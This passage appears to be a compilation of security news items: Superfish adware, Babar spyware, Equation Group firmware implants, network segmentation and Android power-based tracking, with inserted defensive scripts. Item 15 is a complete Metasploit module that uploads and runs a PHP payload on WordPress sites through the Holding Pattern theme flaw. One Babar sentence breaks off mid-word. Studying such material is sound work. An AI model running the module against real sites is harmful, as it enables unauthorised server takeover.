The Superfish Visual Discovery program is delivered pre-installed on several Lenovo notebook models. Adware has been an unwanted guest for most users for a long time, even though it is often not necessarily dangerous. Superfish is, however, unusual because it contains a technology component called SSL Digestor, distributed by Komodia. This component contains an element that triggers the current security problem – a very weakly secured root certificate.

Superfish is used even on Android devices

G Data security experts have discovered two search apps for Android devices that are based on Superfish Visual Discovery. Similar to the PC component, users are presented with advertisements for certain search queries. However, the apps do not rely on SSL Digestor and do not endanger the security of the HTTPS protocol.

The technology undermines HTTPS security

SSL Digestor installs a certificate that allows the program to analyse and manipulate the data flow in HTTPS connections. This component is found in adware programs that users install unintentionally and in programs classified as trojans by IT security vendors. Even apparently legitimate programs rely on this component.

A quick check to find out whether the root certificate is present on your computer can be made here: https://www.gdatasoftware.com/securitylabs/quickcheck/fishbone?no_cache=1

Detailed information, plus instructions on how the Superfish certificate can be removed, can be found on the G DATA SecurityBlog: https://blog.gdatasoftware.com/blog/article/the-power-of-trust-superfish-case-turns-into-a-worst-case-scenario.html

-> Source <-
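As an added example (not from the G DATA article or its blog post), the following PowerShell script lists any certificate in the Windows machine and user root stores whose subject or issuer contains "Superfish", and removes the matches only when run with -Remove. Matching on the name rather than a thumbprint is an assumption, since the article gives no thumbprint; removing from the LocalMachine store requires an elevated prompt.

```powershell
# Added example, not part of the G DATA article.
# Reports (and, with -Remove, deletes) root certificates that match the Superfish
# name in the two Windows root stores that SSL Digestor-style software writes to.
# Assumption: the injected root is identifiable by "Superfish" in Subject/Issuer.
param(
    [switch]$Remove   # without -Remove the script only reports
)

$stores  = @('Cert:\LocalMachine\Root', 'Cert:\CurrentUser\Root')
$pattern = 'Superfish'   # assumed name fragment; adjust if the vendor string differs

$hits = foreach ($store in $stores) {
    Get-ChildItem -Path $store |
        Where-Object { $_.Subject -match $pattern -or $_.Issuer -match $pattern } |
        ForEach-Object {
            [pscustomobject]@{
                Store      = $store
                Subject    = $_.Subject
                Issuer     = $_.Issuer
                SelfSigned = ($_.Subject -eq $_.Issuer)   # a trusted self-signed root is the MITM enabler
                Thumbprint = $_.Thumbprint
                NotAfter   = $_.NotAfter
                Path       = $_.PSPath
            }
        }
}

if (-not $hits) {
    Write-Output "No certificate matching '$pattern' found in the root stores."
    return
}

# Show what was found before touching anything.
$hits | Format-Table Store, Subject, SelfSigned, Thumbprint, NotAfter -AutoSize

if ($Remove) {
    foreach ($h in $hits) {
        # Deleting the root entry makes the interception certificates it signed untrusted.
        Remove-Item -LiteralPath $h.Path -Verbose
    }
}
```

Removing the certificate does not uninstall the interception software itself; the G DATA blog post linked above covers that step.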
  14. G DATA SecurityLabs has investigated a spyware sample that records and transfers keyboard input, clipboard data, monitoring data and audio conversations, thereby confirming Snowden's revelations regarding a spyware strain of French origin, information documented by the Canadian intelligence service CSEC (Communication Security Establishment Canada). The French newspaper Le Monde was the first to report the existence of these documents almost a year ago. G Data experts have published the technical details for the first time, following the analysis of the Babar malware, which was carried out in tandem with other international security research agencies. The analysts could not determine whether these malware control servers were deliberately put into operation or were compromised. In the experts' opinion, developing such a program requires substantial investment in personnel and infrastructure. The malware's level of complexity suggests that it originates from a secret service. The Canadian intelligence service considers responsible for the malw

“Babar is a very sophisticated spyware program that could only have been produced by very well-trained programmers,” explains Eddy Willems, Security Evangelist at G DATA Software AG. “Babar is designed to operate specifically in the networks of companies, authorities, organisations and research institutes, from where it steals sensitive data. As a result, audio conversations, such as those on Skype, for example, can be recorded. Even a targeted attack on individual users seems possible.” A mass distribution of such malware is, however, very unlikely, says Willems.

History of the CSEC documents

In March 2014, the French daily Le Monde received a report on the documents of the Canadian intelligence service CSEC (Communication Security Establishment Canada), dated 2011, which came to light during Edward Snowden's revelations. The German news magazine Der Spiegel took up the subject in January 2015 and published additional content from these documents – Operation Snowglobe.

What is Babar?

Babar is a remote administration tool (RAT) whose main function is to spy on data. According to the Canadian intelligence service, following the analysis of the EvilBunny malware in December 2014, Babar was also the codename of an operation by a national secret service called Snowglobe. This shows that Babar could be the second malware strain identified as being connected to the Snowglobe spyware campaign. The name “Babar” comes from a series of French children's books whose hero is an elephant. Because of the similarities between them, the security experts at G Data are convinced that the two strains come from the same developers.

Detailed technical information can be found on the G Data blog: https://blog.gdatasoftware.com/blog/article/babar-espionage-software-finally-found-and-put-under-the-microscope.html

-> Source <-
  15. ##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'socket'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'WordPress Holding Pattern Theme Arbitrary File Upload',
      'Description'    => %q{
        This module exploits a file upload vulnerability in all versions of the Holding Pattern
        theme found in the upload_file.php script which contains no session or file validation.
        It allows unauthenticated users to upload files of any type and subsequently execute
        PHP scripts in the context of the web server.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Alexander Borg',                   # Vulnerability disclosure
          'Rob Carr <rob[at]rastating.com>'   # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2015-1172'],
          ['WPVDB', '7784'],
          ['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html']
        ],
      'DisclosureDate' => 'Feb 11 2015',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['holding_pattern', {}]],
      'DefaultTarget'  => 0
    ))
  end

  def rhost
    datastore['RHOST']
  end

  def holding_pattern_uploads_url
    normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/')
  end

  def holding_pattern_uploader_url
    normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php')
  end

  def generate_mime_message(payload, payload_name)
    data = Rex::MIME::Message.new
    target_ip = IPSocket.getaddress(rhost)
    field_name = Rex::Text.md5(target_ip)
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
    data
  end

  def exploit
    print_status("#{peer} - Preparing payload...")
    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
    data = generate_mime_message(payload, payload_name)

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => holding_pattern_uploader_url,
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data.to_s
    )

    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
    fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200

    payload_url = normalize_uri(holding_pattern_uploads_url, payload_name)
    print_status("#{peer} - Executing the payload at #{payload_url}")
    register_files_for_cleanup(payload_name)
    send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5)
  end
end

Source
  16. Introduction

Last year – dubbed “the Year of the Hack” – saw numerous major cyber attacks against prominent corporations, including JP Morgan bank and Sony Pictures Entertainment. And after Target in 2013, another retailer, Home Depot, suffered a data breach with more than 56 million credit cards stolen. The consequences of these incidents can be devastating in terms of reputation damage and lawsuits that have been filed, charging negligent IT security control. Hackers exposed lots of poorly protected systems, and we should ask ourselves: What's wrong here? It seems likely that data traffic security and network security have not kept abreast of technological innovation. This article attempts to gain insight into some of the current issues related to the subject matter, such as proper data encryption, network segmentation, traffic originating from mobile devices, etc.

Network Segmentation & Data Encryption

Regulatory guidelines that ensure a general standard of compliance focus on traffic encryption for data that traverses external or public networks, whereas local, inner-core networks are protected by means of logical network segmentation. Isolation of sensitive data on specific internal network repositories and cryptographic segmentation are common security standards today for many institutions that operate with loads of private and confidential information, e.g., banks and hospitals. Network segmentation is possible through technologies like firewalls and routing subnets. On the other hand, the encryption process for data in motion utilizes a large number of forms of encryption, ranging from Web-based/HTTPS encryption to SSL-based VPNs.

Enhanced Security with Proper Network Segmentation

a) Unauthorized network access can be limited through network segmentation or security “zoning”. This mitigation technique will withhold the propagation of a threat, for instance, malicious actors attempting to move across the network. At the same time, segregating the network properly will enable access to those persons who are authorized. Firewalls and VLANs have a function that can partition the network into multiple zones.

Multiple layers of control within the network – IT security corporations are more and more interested in dealing with network segmentation errors. But security is not the only problem with configuring proper network segmentation. Beware that while adding more security layers can impede access by cybercriminals, it can also have a negative impact on business dealings if the configuration is not user-friendly enough. Hence, we are obligated to take into consideration other key benefits associated with well-segmented networks, namely, “the ability to contain network problems, improve performance, and reduce congestion.”

Diagram 1 “Example of Network Segmentation (Part 1)”

Diagram 2 “Example of Network Segmentation (Part 2)”

VLAN Network Segmentation and Security

Network segmentation with virtual local area networks (VLANs) breaks a network into a number of isolated, smaller networks within the data center. Each of these networks operates as a separate logical broadcast domain. Proper VLAN segmentation can significantly hinder threat actors from accessing the system surface, and simultaneously diminishes their packet-sniffing capabilities. Furthermore, VLANs authorize legitimate users to access only those servers and devices related to their duties. VLANs have a positive unloading effect on network performance because the massive broadcast domains are divided into easily manoeuvrable small parts. VLANs provide organizational flexibility, allowing administrators to group segmented mini-networks based on categories such as function, application, and project team. Lastly, VLANs can give secure but convenient mobility to users assigned to a particular VLAN, since they can remain connected to that VLAN irrespective of location.

What do the critics say about VLANs?
VLANs are unable to enforce reliable control of privileged information because they simply isolate network traffic. It is deemed that they cannot inspect this traffic for threats. Moreover, along with other traditional tools, e.g., internal firewalls, VLANs can be a point of failure as far as security, flexibility, and management are concerned. That is because: “they necessitate physically changing the network topology to create or modify a secure domain; firewall rules to control user access incur time-consuming work-around fixes for authorized users; and security measures such as encrypting internal traffic isn't always possible.”

Next-Generation Networks

Software Defined Networking (SDN), Network Virtualization (NV), and Network Functions Virtualization (NFV) present an advanced software-based approach to IT virtualization of entire network architectures. A citation from this document illustrates in a few words the basic characteristics of these cutting-edge technologies:

Software Defined Networking (SDN)

In October 2013, the Open Networking Foundation (ONF) issued a research report in which two potential security challenges related to SDN were addressed:

The centralized controller as a “potential single point of attack and failure.”
The southbound interface between the controller and data-forwarding devices is “vulnerable to threats that could degrade the availability, performance and integrity of the network.”

Measures within the SDN's architecture:

Secure the access to the Controller — protecting the Controller means protecting your SDN;
Create a trusted network environment between the SDN Controller, the applications and the devices, which will protect the communications throughout the network;
Enforce a robust policy framework to constantly check on the proper functioning of the SDN Controller;
Enforce Remediation + Forensics procedures when necessary (i.e., recovery mechanisms, reporting, and analysis).

Security outside the architecture can be embedded in servers, storage and other computing apparatus.

Network Functions Virtualization (NFV)

There are two basic security threats for NFVs: 1) a combination of all generic virtualization threats; 2) threats specific to the network function software. However, virtualization gives some complementary security by eliminating or mitigating several kinds of threats typical for the network function software with the help of new elements like centralized security management and hypervisor introspection. For improving NFV security, Andreas Lemke advises users to utilize the following two-pronged combination:

“Reducing generic virtualization threats as much as possible by securing the virtualization platform
Eliminating as many network function-specific threats as possible by applying NFV-enabled security mechanisms, such as hypervisor-based protection”

Drafting a stringent security policy on what is to be transferred from zone to zone is the next step. Accidental access of third parties to your network must be restricted to cases when it is absolutely needed and areas where there is no other information beyond what is required. A zone that contains highly sensitive data should be isolated as much as possible from the rest of the network, but it should not pose an undue burden on the overall data traffic. Tag zones differently depending on the type of data they contain. With regard to the previous point, be sure that a sensitive type of information is not within the reach of an unauthorized third party. Define “good faith”, innocuous communication paths and block suspicious data traffic. Building an enormous matrix of segregated zones may entail drafting a policy for traffic management between zones. Due to security changes over time, frequent changes in the policy have to be made as well so that the policy in question can respond to the present security dynamics of this new network environment.
There are standards that can provide guidance on how to set up efficient separation of data within the network. The Payment Card Industry Data Security Standard (PCI-DSS) is one such standard, and in this case sensitive information like payment card data should be isolated from the rest of the network.

Case Study: Target Data Breach

As some of the recent data breaches have shown, improper network segmentation can result in exposure of your data to system outages or theft. Stolen third-party credentials can be further exploited for getting a foothold in entire networks. That was the case with the infamous Target data leakage in December 2013. According to Jody Brazil, founder of the security vendor FireMon, Target failed to properly secure the access of third parties to its payment systems. A main lapse seems to be the fact that they did not segment the network to ensure that sensitive cardholder data was separated from what outsiders can access – which is in itself non-compliant with a ubiquitous security practice pursuant to the aforementioned PCI-DSS. Finally, Brazil concludes that despite the sophisticated nature of the malware used to intercept and steal payment card data from the company's point-of-sale (POS) systems, the attacker would have been stopped at the installation phase if Target had followed network segmentation procedures in the first place.

Enhanced Security with Proper Encryption

The classical security architecture counts on the establishment of a trusted internal network guarded by firewalls. Thus, applications in the safe zone are deemed totally trustworthy. Security analysts bring these assumptions into question, as if the old maxim “Hope for the best and prepare for (assume) the worst” were better justified in terms of real-deal proactive security measures like encryption, especially for the preservation of sensitive data.

A survey conducted by Spiceworks, a professional network for IT specialists, ascertains that 76% of IT managers use at least two forms of encryption to ensure that the data traffic of their enterprises is secure. Astonishingly, one out of three admits that he is forced to use three or more kinds of encryption or VPNs for data in motion. It seems clear that this might be a security problem, since these managers cannot reach some form of consensus concerning the promulgation of a uniform and consistent encryption policy, which would encompass all network segments and applications under its belt. Consequently, all gaps and inconsistencies in data traffic security are an aftermath of the existing fragmented environment. Corporations encounter difficulties with encryption management chiefly because of the fragmentation, which has a performance impact on firewalls and network devices. The direct effect of these issues is felt in the form of deployment of less than ideal data traffic security to compensate for shortcomings existing in network systems and firewalls – a dangerous trade-off that IT managers are bound to make. The following statistic reflects on the aforementioned subject: “45% of the respondents said encryption is too difficult to manage to use for segmentation, while 36 percent cited the performance hit on firewalls and network devices when encryption is turned on.” Presumably, the coordination of extremely fragmented, fractured means of data encryption and segmentation is often an arduous chore. Is abstaining from encrypting a viable alternative? Highly unlikely. Nevertheless, more than half of the surveyed organizations confirm that concerns about performance quality preclude them from opting for this multiple encryption.

II. Mobile Data Traffic and Network Security

The mobile unencrypted traffic from apps is growing each month.
At the moment 49% of all app traffic is unencrypted, which means that it is vulnerable to snooping and injection cyber attacks. These pose a significant threat to the normal functioning of day-to-day business operations. Interestingly, outsiders finding a loophole in the corporate network is not as frequent a security nuisance as unsuspecting employees opening a door to a malicious cyber attack. Most users (72%) do not feel uncomfortable (at least at the beginning) with sharing sensitive information in their apps, such as credit card details and passwords.

Diagram 3 Source: http://commons.wikimedia.org/wiki/File:Consumerization_Report_-_Chart_3.jpg (by Cgarlati).

Bring Your Own Device (BYOD)

Many people in Western countries have up to five Internet-connectable devices and 300 identities across a great number of online shopping portals and social media – an ongoing tendency that ushers in the bring your own device (BYOD) revolution. From a business point of view, there is a monetary as well as reputational risk associated with not being able to protect the data entrusted to them because of the increasing adoption of personal devices in the workplace. And from a data transfer perspective, the equation gets even more complicated when cloud-based platforms allow employees to access business information regardless of geographic location. Besides proper employee management (that could be IT security training of personnel), identity control based on staff movement restrictions across virtual, cloud and physical environments is vital for complying with the current standards in terms of efficiency and security.

The silo style of mobility

Mobile-device management and enterprise-mobility management have been developed by enterprises to manage devices like tablets and smartphones. Under the standard approach, these two systems integrate with a VPN server, for instance, to set up an encrypted data connection to the company.
The silo-based nature of all mobile devices, however, confines perimeter protection to the company's boundaries. Consequently, if an employee has credentials on his mobile device, a malicious actor who obtains them can leverage them to gain unfettered access to internal networks. And we all know that personal devices typically do not run antivirus/antimalware software and often share information with untrustworthy apps. The security threat stems from the fact that all internal networks of the corporation continue to be considered "safe" and "trusted" (see Diagram 4). As a result, enterprises often use insufficient controls to segment data traffic and to secure or isolate internal applications and the sensitive servers behind them.

Diagram 4

Conclusion

The Spiceworks survey reported that improving network security was put on the priority agenda for the IT sector in 2015. Approximately two-thirds of the enterprises participating in the survey envisage allocating funds to network security projects this year. We can only hope that these measures will not come "too little, too late". And while investment in the reconstruction of outdated network architectures and data traffic mechanisms is important, we should not forget to adjust our own perception to these changes.

Reference List

Boone, A. (2015). Network Security Trends and Outlook. Retrieved on 15/02/2015 from https://www.sdxcentral.com/articles/contributed/network-security-trends-and-outlook-2015/2015/01/
Boone, A. (2015). 2015 Predictions: Mobile security set for change in 2015. Retrieved on 15/02/2015 from http://www.rcrwireless.com/20150109/opinion/2015-predictions-mobile-security-set-for-change-in-2015-tag10
Certes (2015). Solving the data traffic encryption tangle. Retrieved on 15/02/2015 from http://certesnetworks.com/blog/solving-the-data-traffic-encryption-tangle/
Cryptzone. Network Segmentation. Retrieved on 15/02/2015 from http://www.cryptzone.com/solutions/network-segmentation
Forsyth, L. (2012). Poor data security can cause lasting damage to your enterprise. Retrieved on 15/02/2015 from http://www.theguardian.com/media-network/media-network-blog/2012/dec/13/internet-data-security-enterprise
Harrison, R. (2014). Network Segmentation Key To Good Network Hygiene. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-key-to-good-network-hygiene/a/d-id/1269687
McGillicuddy, S. (2014). SDN security issues: How secure is the SDN stack? Retrieved on 15/02/2015 from http://searchsdn.techtarget.com/news/2240214438/SDN-security-issues-How-secure-is-the-SDN-stack
Natarajan, P. (2014). Rock-solid Data Traffic Security in a Virtualized Network World. Retrieved on 15/02/2015 from www.ciena.com/connect/blog/Rock-solid-Data-Traffic-Security-in-a-Virtualized-Network-World.html
Open Networking Foundation (2013). SDN Security Considerations in the Data Center. Retrieved on 15/02/2015 from https://www.opennetworking.org/images/stories/downloads/sdn-resources/solution-briefs/sb-security-data-center.pdf
Olzak, T. (2012). VLAN Network Segmentation and Security - Chapter 5. Retrieved on 15/02/2015 from http://resources.infosecinstitute.com/vlan-network-chapter-5/
Palo Alto Networks. Zero Trust Approach To Network Segmentation. Retrieved on 15/02/2015 from https://www.paloaltonetworks.com/solutions/initiative/network-segmentation.html
Philbin (2014). Mobile Data Trends Report shows nearly half of app traffic now unencrypted. Retrieved on 15/02/2015 from https://www.wandera.com/blog/mobile-data-trends-report-shows-nearly-half-of-app-traffic-now-unencrypted/
Reichenberg, N. (2014). Improving Security via Proper Network Segmentation. Retrieved on 15/02/2015 from http://www.securityweek.com/improving-security-proper-network-segmentation
SDNCentral. SDN Security Challenges in SDN Environments. Retrieved on 15/02/2015 from https://www.sdxcentral.com/resources/security/security-challenges-sdn-software-defined-networks/
TrendMicro (2013). Catch Evasive Threats That Hide Behind Real Network Traffic. Retrieved on 15/02/2015 from www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-network-detection-evasion-methods.pdf
Vijayan, J. (2014). Target breach happened because of a basic network segmentation error. Retrieved on 15/02/2015 from http://www.computerworld.com/article/2487425/cybercrime-hacking/target-breach-happened-because-of-a-basic-network-segmentation-error.html

Diagrams 1 and 2 are based on graphs in: Raza, K. (2015). Network Segmentation & SD-WAN. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-and-sd-wan/a/d-id/1318634

Source
17. One of the most shocking parts of the recently discovered Equation Group spying network is its mysterious module designed to reprogram or reflash a computer hard drive's firmware with malicious code. The Kaspersky researchers who uncovered it said its ability to subvert hard drive firmware, the guts of any computer, "surpasses anything else" they had ever seen.

The hacking tool, believed to be a product of the NSA, is significant because subverting the firmware gives the attackers God-like control of the system in a way that is stealthy and persistent even through software updates. The module, named "nls_933w.dll", is the first of its kind found in the wild and is used with both the EquationDrug and GrayFish spy platforms Kaspersky uncovered.

It also has another capability: creating invisible storage space on the hard drive to hide data stolen from the system so the attackers can retrieve it later. This lets spies like the Equation Group bypass disk encryption by secreting documents they want to seize in areas that don't get encrypted.

Kaspersky has so far uncovered 500 victims of the Equation Group, but only five of these had the firmware-flashing module on their systems. The flasher module is likely reserved for significant systems that present special surveillance challenges. Costin Raiu, director of Kaspersky's Global Research and Analysis Team, believes these are high-value computers that are not connected to the internet and are protected with disk encryption. Here's what we know about the firmware-flashing module.

How It Works

Hard drives have a controller, essentially a mini-computer, that includes a memory chip or flash ROM where the firmware code for operating the drive resides. When a machine is infected with EquationDrug or GrayFish, the firmware flasher module gets deposited onto the system and reaches out to a command server to obtain payload code that it then flashes to the firmware, replacing the existing firmware with a malicious one. The researchers uncovered two versions of the flasher module: one that appears to have been compiled in 2010 and is used with EquationDrug, and one with a 2013 compilation date that is used with GrayFish.

The Trojanized firmware lets attackers stay on the system even through software updates. If a victim, suspecting the computer is infected, wipes the operating system and reinstalls it to eliminate any malicious code, the malicious firmware remains untouched. It can then reach out to the command server to restore all of the other malicious components that were wiped from the system. Even if the firmware itself is updated with a new vendor release, the malicious code may still persist, because some firmware updates replace only parts of the firmware, so the malicious portions may not get overwritten. The only solution for victims is to discard the hard drive and start over with a new one.

The attack works because firmware was never designed with security in mind. Hard disk makers don't cryptographically sign the firmware they install on drives the way software vendors do, and drive designs have no built-in authentication to check for signed firmware. This makes it possible for someone to change the firmware. Firmware is also the perfect place to conceal malware because antivirus scanners don't examine it, and there is no easy way for users to read the firmware and manually check whether it has been altered.

The firmware flasher module can reprogram the firmware of more than a dozen different hard drive brands, including IBM, Seagate, Western Digital, and Toshiba. "You know how much effort it takes to land just one firmware for a hard drive? You need to know specifications, the CPU, the architecture of the firmware, how it works," Raiu says. The Kaspersky researchers have called it "an astonishing technical accomplishment and is testament to the group's abilities."

Once the firmware is replaced with the Trojanized version, the flasher module creates an API that can communicate with other malicious modules on the system and also access hidden sectors of the disk where the attackers want to conceal data they intend to steal. They hide this data in the so-called service area of the hard drive, where the drive stores data needed for its internal operation.

Hidden Storage Is the Holy Grail

The revelation that the firmware hack helps store data the attackers want to steal didn't get much play when the story broke last week, but it's the most significant part of the hack. It also raises a number of questions about how exactly the attackers are pulling this off. Without an actual copy of the firmware payload that gets flashed to infected systems, there's still a lot that's unknown about the attack, but some of it can be surmised.

The ROM chip that contains the firmware includes a small amount of storage that goes unused. If the ROM chip is 2 megabytes, the firmware might take up just 1.5 megabytes, leaving half a megabyte of unused space that can be employed for hiding data the attackers want to steal. This is particularly useful if the computer has disk encryption enabled. Because the EquationDrug and GrayFish malware run in Windows, they can grab a copy of documents while they're unencrypted and save them to this hidden area, which doesn't get encrypted. There isn't much space on the chip for a lot of data or documents, however, so the attackers can also store something equally valuable for bypassing encryption.

"Taking into account the fact that their GrayFish implant is active from the very boot of the system, they have the ability to capture the encryption password and save it into this hidden area," Raiu says. Authorities could later grab the computer, perhaps through border interdiction or something the NSA calls "customs opportunities," and extract the password from this hidden area to unlock the encrypted disk.

Raiu thinks the intended targets of such a scheme are limited to machines that are not connected to the internet and have encrypted hard drives. One of the five machines they found hit with the firmware flasher module had no internet connection and was used for special secure communications. "[The owners] only use it in some very specific cases where there is no other way around it," Raiu says. "Think about Bin Laden who lived in the desert in an isolated compound—doesn't have internet and no electronic footprint. So if you want information from his computer how do you get it? You get documents into the hidden area and you wait, and then after one or two years you come back and steal it. The benefits [of using this] are very specific."

Raiu thinks, however, that the attackers have a grander scheme in mind. "In the future probably they want to take it to the next level where they just copy all the documents [into the hidden area] instead of the password. [Then] at some point, when they have an opportunity to have physical access to the system, they can then access that hidden area and get the unencrypted docs."

They wouldn't need the password if they could copy an entire directory from the operating system to the hidden sector for access later. But the flash chip where the firmware resides is too small for large amounts of data, so the attackers would need a bigger hidden space for storage. Luckily for them, it exists.

There are large sectors in the service area of the hard drive that are also unused and could be commandeered to store a large cache of documents, even ones that might have been deleted from other parts of the computer. This service area, also called the reserved area or system area, stores the firmware and other data needed to operate the drive, but it also contains large portions of unused space. An interesting paper (.pdf) published in February 2013 by Ariel Berkman, a data recovery specialist at the Israeli firm Recover, noted that "not only that these areas can't be sanitized (via standard tools), they cannot be accessed via anti-virus software [or] computer forensics tools." Berkman points out that one particular model of Western Digital drive has 141 MB reserved for the service area but uses only 12 MB of it, leaving the rest free for stealth storage.

Writing or copying data to the service area requires special commands that are specific to each vendor and are not publicly documented, so an attacker would need to uncover what these are. But once they do, "by sending Vendor Specific Commands (VSCs) directly to the hard-drive, one can manipulate these [service] areas to read and write data that are otherwise inaccessible," Berkman writes. It is also possible, though not trivial, to write a program to automatically copy documents to this area. Berkman himself wrote a proof-of-concept program to read and write a file of up to 94 MB to the service area, but the program was a bit unstable and he noted that it could cause some data loss or cause the hard drive to fail.

One problem with hiding large amounts of data like this, however, is that its presence might be detected by examining the size of the used space in the service area. If there should be 129 MB of unused space in this area but there is only 80 MB, it's a dead giveaway that something is there that shouldn't be. But a leaked NSA document written in 2006 and published by Der Spiegel last month suggests the spy agency might have resolved this particular problem.

NSA Interns to the Rescue

The document (.pdf) is essentially a wish list of future spy capabilities the NSA hoped to develop for its so-called Persistence Division, a division that has an attack team within it that focuses on establishing and maintaining persistence on compromised machines by subverting their firmware, BIOS, BUS or drivers. The document lists a number of projects the NSA put together for interns to tackle on behalf of this attack team. Among them is the "Covert Storage" project for developing a hard drive firmware implant that can prevent covert storage on disks from being detected. To do this, the implant prevents the system from disclosing the true amount of free space available on the disk.

"The idea would be to modify the firmware of a particular hard drive so that it normally only recognizes, say, half of its available space," the document reads. "It would report this size back to the operating system and not provide any way to access the additional space." Only one partition of the drive would be visible in the partition table, leaving the other partitions, where the hidden data was stored, invisible and inaccessible. The modified firmware would have a special hook embedded in it that would unlock this hidden storage space only after a custom command was sent to the drive and the computer was rebooted. The hidden partition would then be available in the partition table and accessible until the secret storage was locked again with another custom command.

How exactly the spy agency planned to retrieve the hidden data is unclear from the eight-year-old document. Also unclear is whether the interns ever produced a firmware implant that accomplished what the NSA sought. But given that the document includes a note that interns would be expected to produce a solution for their project within six months of assignment, and considering the proven ingenuity of the NSA in other matters, they no doubt figured it out.

Source
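The check a practitioner would run on a drive suspected of the "report only half of its capacity" trick described in the NSA note above is to compare what the drive tells the OS with its native maximum. The following is an added example, not code from Kaspersky, Wired or the leaked document: it decodes an ATA IDENTIFY DEVICE block (capacity words, HPA/DCO feature bits, identity strings) and computes how many sectors are unaccounted for given the result of READ NATIVE MAX ADDRESS. The IDENTIFY block is constructed in-line; on a real Linux host the two inputs come from the ATA IDENTIFY DEVICE and READ NATIVE MAX ADDRESS (EXT) commands, which hdparm -I and hdparm -N issue through the SG_IO ioctl.

```python
"""Capacity audit for a drive suspected of hiding space.
Added example (not Kaspersky's, Wired's or NSA code): decodes an ATA IDENTIFY
DEVICE block and compares the reported sector count with the native maximum.
The IDENTIFY block used below is constructed, not read from a real drive."""
import struct

SECTOR_BYTES = 512


def _ata_string(words, first, last):
    """ATA strings are stored big-endian inside each 16-bit word."""
    raw = b"".join(struct.pack(">H", w) for w in words[first:last + 1])
    return raw.decode("ascii", "replace").strip()


def parse_identify(block):
    """Decode the IDENTIFY DEVICE fields a capacity audit needs: identity
    strings, LBA28/LBA48 sector counts and the HPA / DCO feature bits."""
    if len(block) != 512:
        raise ValueError("IDENTIFY DEVICE response must be 512 bytes")
    w = struct.unpack("<256H", block)
    return {
        "serial": _ata_string(w, 10, 19),
        "firmware": _ata_string(w, 23, 26),
        "model": _ata_string(w, 27, 46),
        "lba28_sectors": w[60] | (w[61] << 16),
        "lba48_sectors": w[100] | (w[101] << 16) | (w[102] << 32) | (w[103] << 48),
        "hpa_supported": bool(w[82] & (1 << 10)),    # word 82 bit 10: Host Protected Area
        "lba48_supported": bool(w[83] & (1 << 10)),  # word 83 bit 10: 48-bit addressing
        "dco_supported": bool(w[83] & (1 << 11)),    # word 83 bit 11: Device Config Overlay
    }


def reported_sectors(identify):
    """Capacity the drive advertises to the OS."""
    return identify["lba48_sectors"] if identify["lba48_supported"] else identify["lba28_sectors"]


def hidden_sectors(identify, native_max_lba):
    """READ NATIVE MAX ADDRESS returns the highest LBA the media really has, so
    the native count is native_max_lba + 1. Anything above what IDENTIFY
    reports is hidden (HPA, DCO or a firmware that lies about its size)."""
    return (native_max_lba + 1) - reported_sectors(identify)


def build_identify(model, firmware, serial, sectors, hpa=True, dco=True):
    """Construct a synthetic IDENTIFY DEVICE block for offline testing."""
    w = [0] * 256

    def put(first, last, text):
        n = (last - first + 1) * 2
        padded = text[:n].ljust(n).encode("ascii")
        for i in range(first, last + 1):
            off = (i - first) * 2
            w[i] = struct.unpack(">H", padded[off:off + 2])[0]

    put(10, 19, serial)
    put(23, 26, firmware)
    put(27, 46, model)
    lba28 = min(sectors, 0x0FFFFFFF)              # LBA28 field saturates at 2^28 - 1
    w[60], w[61] = lba28 & 0xFFFF, lba28 >> 16
    for i in range(4):                            # words 100-103: LBA48 count
        w[100 + i] = (sectors >> (16 * i)) & 0xFFFF
    w[82] = (1 << 10) if hpa else 0
    w[83] = (1 << 10) | ((1 << 11) if dco else 0)
    return struct.pack("<256H", *w)


if __name__ == "__main__":
    # Constructed case: ~1 TB of media whose firmware reports only half of it.
    NATIVE_SECTORS = 1953525168
    ident = parse_identify(build_identify("EXAMPLE HDD 1000", "FW01", "SN0001",
                                          NATIVE_SECTORS // 2))
    hidden = hidden_sectors(ident, NATIVE_SECTORS - 1)
    print(ident["model"], ident["firmware"], "hidden sectors:", hidden,
          "(%.1f GiB)" % (hidden * SECTOR_BYTES / 2 ** 30))
```

Two caveats apply. The service-area storage Berkman describes lies outside the user LBA space altogether, so this comparison cannot see it; and a firmware that has been replaced wholesale can lie to READ NATIVE MAX ADDRESS just as easily as to IDENTIFY, so a mismatch here is evidence, but a match is not a clean bill of health.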
18. Android phones can be tracked without using their GPS or wi-fi data by studying their power use over time, a study has found.

A smartphone uses more power the further away it is from a cellular base station and the more obstacles are in its way as it reaches for a signal. Additional power use by other activities could be factored out with algorithms, the researchers found. They created an app designed to collect data about power consumption.

"The malicious app has neither permission to access the GPS nor other location providers (eg cellular or wi-fi network)," the team - Yan Michalevsky, Dan Boneh and Aaron Schulman, from the computer science department at Stanford University, along with Gabi Nakibly, from Rafael Ltd - wrote in their paper. "We only assume permission for network connectivity and access to the power data. These are very common permissions for an application, and are unlikely to raise suspicion on the part of the victim."

There are 179 apps currently available on the Android app store Google Play that request this information, the team adds.

